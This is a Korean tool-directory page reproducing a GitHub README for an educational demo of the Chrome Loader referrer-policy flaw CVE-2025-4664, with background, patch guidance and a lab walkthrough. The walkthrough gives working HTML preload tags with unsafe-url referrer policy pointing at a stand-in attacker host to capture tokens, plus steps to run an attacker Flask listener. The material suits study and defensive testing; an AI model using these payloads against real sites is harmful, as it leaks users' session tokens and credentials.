Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-4664 — CVE-2025-4664에 대한 교육용 데모로, referrer-policy 조작을 통해 교차 출처 데이터 누출을 가능하게 하는 Chrome Loader 취약점입니다. 피해자 HTML 페이지와 공격자 Flask 서버를 포함하여 실습 악용 시뮬레이션을 제공합니다. | Kitploit
도구/GitHubGitHub/speinador/cve-2025-4664
Vulnerability AnalysisExploitationInformation GatheringPhishingWeb SecurityLearning & Education
GitHubspeinador/cve-2025-4664

CVE-2025-4664

CVE-2025-4664에 대한 교육용 데모로, referrer-policy 조작을 통해 교차 출처 데이터 누출을 가능하게 하는 Chrome Loader 취약점입니다. 피해자 HTML 페이지와 공격자 Flask 서버를 포함하여 실습 악용 시뮬레이션을 제공합니다.

저장소 보기
41년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🔒 CVE-2025-4664 취약점

CVE-2025-4664 취약점은 Google Chrome 136.0.7103.113 이전 버전의 Loader 구성 요소에서 확인된 심각도가 높은 보안 결함입니다. 이 문제로 인해 원격 공격자는 특수하게 제작된 HTML 페이지를 통해 교차 출처(cross-origin) 데이터를 유출할 수 있으며, 세션 토큰이나 인증 자격 증명과 같은 민감한 정보가 손상될 수 있습니다.


❓ 이 취약점이란 무엇인가요?

이 결함은 Chrome의 Loader 구성 요소에서 보안 정책이 부적절하게 구현된 데서 비롯됩니다. 구체적으로 Chrome은 다른 브라우저에서는 적용되지 않는 상황에서도 하위 리소스(이미지 또는 스크립트 등) 요청 시 HTTP Link 헤더의 referrer-policy 지시문을 해석합니다. 공격자는 unsafe-url과 같이 덜 제한적인 정책을 설정하여 이 점을 악용할 수 있으며, 이로 인해 Chrome은 민감한 매개변수를 포함한 전체 URL을 공격자가 제어하는 도메인으로 유출하게 됩니다.


⚠️ 영향 및 활발한 악용

이 취약점은 실제 환경에서 활발히 악용되었으며, 이로 인해 미국 사이버보안 및 인프라 보안국(CISA)이 이를 KEV(알려지고 악용된 취약점 카탈로그)에 포함시켰습니다. CISA는 연방 기관이 해당 수정 사항을 적용해야 하는 기한을 2025년 6월 5일로 설정했습니다.


🛡️ 완화 조치 및 권장 사항

Google은 이 취약점을 수정하는 업데이트를 다음 버전으로 출시했습니다:

  • 🖥️ Windows 및 Mac: 136.0.7103.113/.114
  • 🐧 Linux: 136.0.7103.113

모든 사용자는 Chrome 브라우저를 사용 가능한 최신 버전으로 업데이트할 것을 강력히 권장합니다. 업데이트를 확인하고 적용하려면:

  1. 🔍 Chrome을 열고 오른쪽 상단 모서리에 있는 세 점 메뉴를 클릭합니다.
  2. ⚙️ "도움말"을 선택한 다음 "Chrome 정보"를 선택합니다.
  3. ⬇️ Chrome이 업데이트를 자동으로 확인하고 사용 가능한 경우 설치합니다.
  4. 🔄 업데이트 후 변경 사항을 적용하려면 브라우저를 다시 시작합니다.

또한 Microsoft Edge, Brave, Opera, Vivaldi와 같은 Chromium 기반 브라우저 사용자도 이 취약점의 영향을 받을 수 있으므로 해당 업데이트에 주의를 기울여야 합니다.

브라우저를 최신 상태로 유지하는 것은 활발한 보안 위협으로부터 보호하고 개인 정보를 안전하게 지키는 데 필수적입니다.


🕵️‍♂️ 어떻게 악용되나요?

CVE-2025-4664 취약점은 Google Chrome이 HTML 링크에서 하위 리소스(이미지, 스크립트 등)를 로드할 때 참조 정책(referrer-policy)을 처리하는 방식을 조작하여 악용됩니다.


⚙️ 기술적으로 어떻게 악용되나:

  1. 🌐 악성 사이트 생성:
    공격자는 HTTP 헤더에 다음과 같은 HTML 링크를 포함하는 웹사이트를 만듭니다:

    root@kitploit:~
    <link rel="preload" as="image" href="https://victima.com/imagen.jpg" referrerpolicy="unsafe-url">
    
  2. 🔧 referrer-policy 조작: 대부분의 브라우저에서는 태그의 이 referrerpolicy가 로드된 리소스에 적용되지 않습니다. 그러나 Chrome은 이를 적용하며, 이것이 문제의 핵심입니다.

  3. 📤 Referer 유출: 피해자(Chrome)의 브라우저가 victima.com에서 리소스를 로드할 때 출처 사이트의 전체 URL을 Referer 헤더로 전송하며, 여기에는 다음이 포함될 수 있습니다:

  • 세션 토큰 (?token=ABC123)
  • 민감한 매개변수 (?user=admin&password=1234)
  • 개인 URL
  1. 🎯 공격자 서버에서 수신: 공격자는 리소스의 대상으로 자신이 제어하는 URL을 지정할 수 있습니다. 예:
root@kitploit:~
<link rel="preload" as="image" href="https://atacante.com/captura.jpg" referrerpolicy="unsafe-url">

피해자가 이 리소스에 접근하면 Chrome은 전체 URL을 Referer로 공격자 서버에 전송합니다.

  1. 🕵️ 정보 탈취: 공격자 서버는 HTTP 헤더를 기록하여 피해자 URL의 전체 내용을 획득합니다. 여기에는 기밀 데이터, 액세스 토큰 또는 내부 API URL이 포함될 수 있습니다.

✔️ 악용에 필요한 조건:

  • 👤 피해자가 패치되지 않은 Google Chrome을 사용해야 합니다.
  • 🔑 피해자 사이트의 URL에 인증 토큰과 같은 민감한 정보가 포함되어 있어야 합니다.
  • 🎣 공격자가 피해자의 브라우저가 자신의 도메인에서 리소스를 로드하도록 유도해야 합니다(예: 피싱, 악성 광고 또는 리디렉션을 통해).

🧪 실제 공격 예시(단순화):

1- 공격자가 피해자에게 다음 링크를 보냅니다:

root@kitploit:~
https://atacante.com/pagina-maliciosa.html
  1. 해당 페이지에서 다음과 같은 내용이 로드됩니다:
root@kitploit:~
<link rel="preload" as="image" href="https://victima.com/perfil?token=ABC123" referrerpolicy="unsafe-url">
  1. Chrome 브라우저가 다음을 전송합니다:
root@kitploit:~
Referer: https://victima.com/perfil?token=ABC123

공격자 도메인으로, 토큰이 노출됩니다.

프로필 사진

프로젝트 파일

🖥️ index.html — 피해자 파일

이 파일은 공격의 피해자를 시뮬레이션하며, 악성 태그를 사용하여 CVE-2025-4664 취약점을 악용하는 방법을 보여주는 단순화된 HTML 데모입니다:

  • 취약한 인터페이스를 나타냅니다.
  • 통제된 환경에서 취약점이 어떻게 작동하는지 시연하는 데 사용됩니다.
  • CVE-2025-4664에 따라 공격자가 악용할 수 있는 요소를 포함합니다.
root@kitploit:~
<!DOCTYPE html>
<html lang="es">
<head>
  <meta charset="UTF-8">
  <title>Demo CVE-2025-4664</title>

  <!-- Este recurso apunta a un sitio de la víctima con información sensible en la URL -->
  <link rel="preload" as="image"
        href="https://victima.com/perfil?token=ABC123"
        referrerpolicy="unsafe-url">
</head>
<body>
  <h1>Demostración de la vulnerabilidad CVE-2025-4664</h1>
  <p>Si estás usando una versión vulnerable de Chrome, el navegador enviará el <strong>Referer completo</strong> a la URL de arriba.</p>
</body>
</html>

이 코드가 하는 역할:

  • 태그는 URL에 토큰이 포함된 victima.com의 이미지를 사전 로드하도록 구성되어 있습니다.
  • referrerpolicy="unsafe-url"을 사용하면 Chrome은 현재 페이지의 전체 URL을 Referer로 피해자 도메인에 전송합니다.
  • 이미지가 공격자 자신의 서버를 가리키는 경우 공격자는 로그에서 해당 전체 URL을 캡처할 수 있습니다.

🐍 servidor_atacante.py — 공격자 파일

이 스크립트를 사용하면 Python 기반 소형 서버를 통해 Referer를 캡처하는 공격을 자동화할 수 있습니다. 다음은 데이터를 수신하는 공격자 서버를 시뮬레이션하기 위해 Flask를 사용한 예시입니다:

  • index.html로 표현된 피해자에 대한 공격을 시뮬레이션합니다.
  • 취약점에 설명된 기술을 구현합니다.
  • 구현된 완화 조치를 테스트하고 검증하는 데 사용됩니다.

사용 방법:

  1. 해당 코드를 servidor_atacante.py로 저장합니다.
  2. Flask가 없다면 설치합니다:
root@kitploit:~
pip install flask
  1. 서버를 실행합니다:
root@kitploit:~
python servidor_atacante.py
  1. 그런 다음 HTML 데모를 다음과 같이 수정합니다:
root@kitploit:~
<link rel="preload" as="image"
      href="http://<tu_IP>:8080/captura.jpg"
      referrerpolicy="unsafe-url">

스크립트를 실행하는 서버의 공인 IP 또는 로컬 IP로 <tu_IP>를 바꾸세요.


💪 프로젝트 사용 방법

🛠️ 1. Flask 서버 실행하기

  1. 터미널(PowerShell 또는 CMD)을 엽니다.

  2. 파일이 있는 폴더로 이동합니다:

root@kitploit:~
cd "C:\Users\Sebas\Desktop\servidor_atacante"
  1. Flask를 실행합니다:
root@kitploit:~
python servidor_atacante.py
  1. 다음과 같은 출력이 표시됩니다:
root@kitploit:~
* Running on http://127.0.0.1:8080
* Running on http://192.168.1.35:8080

🌐 2. index.html 생성 및 열기(피해자 시뮬레이션)

같은 폴더(C:\Users\Sebas\Desktop\servidor_atacante)에 다음 내용으로 index.html이라는 파일을 만듭니다:

root@kitploit:~
<!DOCTYPE html>
<html lang="es">
<head>
  <meta charset="UTF-8">
  <title>Demo CVE-2025-4664</title>

  <!-- Simula el ataque -->
  <link rel="preload" as="image"
        href="http://192.168.1.35:8080/captura.jpg"
        referrerpolicy="unsafe-url">
</head>
<body>
  <h1>Simulación CVE-2025-4664</h1>
  <p>Este HTML intenta filtrar la URL completa (incluyendo el token) al atacante.</p>
</body>
</html>

✅ 중요: IP(192.168.1.35)가 Flask가 로컬 IP로 표시하는 주소와 일치하는지 확인하세요. 다르다면 HTML에서 변경하세요.

🚀 3. 민감한 매개변수를 포함한 index.html 열기

  1. Chrome을 엽니다.

  2. 주소 표시줄에 다음을 입력합니다:

root@kitploit:~
file:///C:/[Carpeta destino]/servidor_atacante/index.html?token=ABC123
  1. Enter 키를 누릅니다.

  2. 📥 서버에서 결과 확인하기 Flask 콘솔에서 다음과 같은 내용이 표시되어야 합니다:

root@kitploit:~
[+] Referer recibido: file:///C:/[Carpeta destino]/servidor_atacante/index.html?token=ABC123

[Carpeta destino]: 파일이 저장된 위치에 따라 이 매개변수를 수정하세요.

🎯 브라우저가 전체 Referer를 공격자에게 전송했다는 뜻입니다!


🧑‍🏫 저자

공격적 사이버보안에 대한 교육 및 연구 목적으로 Sebastian Peinador가 작성한 설명입니다.


📄 라이선스

이 자료는 MIT 라이선스에 따라 배포됩니다.


유용하게 여겨지신다면, ⭐를 눌러 리포지토리를 응원하거나 공유하는 것을 잊지 마세요!

도구 다운로드